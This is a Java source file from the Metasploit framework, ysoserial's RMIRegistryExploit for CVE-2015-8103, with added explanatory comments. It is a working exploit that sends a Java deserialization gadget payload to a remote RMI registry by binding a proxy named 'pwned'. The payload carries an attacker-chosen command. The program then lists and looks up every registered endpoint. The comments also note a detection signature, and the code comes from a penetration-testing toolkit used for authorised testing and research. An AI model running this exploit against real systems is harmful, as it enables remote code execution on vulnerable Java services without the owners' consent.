GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/RMIRegistryExploit.java
package ysoserial;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.Arrays;
import java.util.concurrent.Callable;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.util.Gadgets;
/*
* Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
* Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
*
* TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
* interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
*/
public class RMIRegistryExploit {

    /**
     * Entry point.
     *
     * <p>Positional arguments (none are validated before use; fewer than four throws
     * {@link ArrayIndexOutOfBoundsException}):
     * <ul>
     *   <li>{@code args[0]} - registry host, passed to {@link LocateRegistry#getRegistry(String, int)}</li>
     *   <li>{@code args[1]} - registry port, parsed with {@link Integer#parseInt(String)}</li>
     *   <li>{@code args[2]} - simple name of a payload class, resolved inside the package of
     *       {@link CommonsCollections1}</li>
     *   <li>{@code args[3]} - string handed to {@link ObjectPayload#getObject(String)}</li>
     * </ul>
     *
     * <p>Flow: build the payload object, wrap it in a {@link Remote} proxy via {@code Gadgets},
     * call {@code registry.bind("pwned", remote)}, then {@code list()} every registered name,
     * {@code lookup()} each one and print the interfaces its stub implements. Every failure is
     * caught as {@link Throwable} and only printed; the exit code never reflects success or
     * failure.
     *
     * <p>Observable from the registry side: a {@code bind()} of the name {@code "pwned"} followed
     * by a {@code list()} and a {@code lookup()} of every entry - useful as a detection signature.
     *
     * <p>The whole body runs under {@code ExecBlockingSecurityManager.wrap} (project class, not
     * shown here); the inline comment below states its purpose.
     *
     * @param args see above
     * @throws Exception anything propagated out of the wrapped callable
     */
    public static void main(final String[] args) throws Exception {
        // ensure payload doesn't detonate during construction or deserialization
        ExecBlockingSecurityManager.wrap(new Callable<Void>(){public Void call() throws Exception {
            Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));
            // The payload class is named relative to the ysoserial.payloads package, so args[2]
            // is a simple name such as the one of CommonsCollections1, not a fully qualified one.
            String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
            // Unchecked cast: a class that does not implement ObjectPayload fails only at runtime,
            // on the getObject() call below.
            Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
            // Class.newInstance() is deprecated since Java 9 (it rethrows the constructor's checked
            // exceptions unchecked); getDeclaredConstructor().newInstance() is the modern form.
            Object payload = payloadClass.newInstance().getObject(args[3]);
            // Gadgets.createMemoitizedProxy / createMap are project helpers (not shown). The result
            // is typed as Remote so that bind() accepts it as its second argument.
            Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
            try {
                // The proxy is sent to the registry here. Any error - including the
                // AccessException RMI raises for a bind() from a non-local host - is only printed.
                registry.bind("pwned", remote);
            } catch (Throwable e) {
                e.printStackTrace();
            }

            try {
                // Enumeration pass: print every registered name and the interfaces of its stub.
                // NOTE(review): the stub returned by lookup() is deserialised in this JVM (RMI
                // semantics), which is presumably the "deserialization" the wrapper comment refers to.
                String[] names = registry.list();
                for (String name : names) {
                    System.out.println("looking up '" + name + "'");
                    try {
                        Remote rem = registry.lookup(name);
                        // Only the interface list is reported; acting on these endpoints is the
                        // open TODO in the class comment and is not implemented here.
                        System.out.println(Arrays.asList(rem.getClass().getInterfaces()));
                    } catch (Throwable e) {
                        e.printStackTrace();
                    }
                }
            } catch (Throwable e) {
                // A failed list() (registry unreachable, etc.) ends the run with nothing but a trace.
                e.printStackTrace();
            }

            return null; // Callable<Void> contract
        }});
    }
}